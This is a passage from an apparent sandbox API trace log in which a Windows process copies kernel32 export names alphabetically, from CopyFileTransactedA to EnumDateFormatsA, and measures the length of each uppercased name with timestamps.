returned="CopyFileTransactedA" [0087.058] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.058] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.058] lstrlenA (lpString="COPYFILEW") returned 9 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.058] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.058] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.058] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.058] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.058] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.058] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.059] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.059] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.059] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.059] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.059] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.059] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.059] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.059] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.059] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.059] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.059] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.059] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.059] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.059] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.059] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.059] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.059] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.059] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.060] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.060] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.060] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.060] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.060] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.060] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.060] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.060] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.060] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.060] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.060] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.060] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.060] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.060] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.060] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.060] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.060] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.061] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.061] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.061] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.061] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.061] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.061] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.061] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.061] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.061] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.061] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.061] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.061] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.061] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.061] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.061] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.061] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.062] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.062] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.062] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.062] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.062] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.062] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.062] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.062] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.062] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.062] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.062] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.062] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.062] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.062] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.062] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.062] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.062] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.062] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.062] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.063] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.063] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.063] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.063] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.063] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.063] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.063] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.063] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.063] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.063] lstrlenA (lpString="DELETEATOM") returned 10 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.063] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.063] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.063] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.063] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.063] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.063] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.063] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.063] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.064] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.064] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.064] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.064] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.064] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.064] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.064] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.064] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.064] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.064] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.064] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.064] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.064] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.064] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.064] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.064] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.064] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.064] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.065] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.065] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.065] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.065] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.065] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.065] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.065] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.065] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.065] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.065] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.065] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, 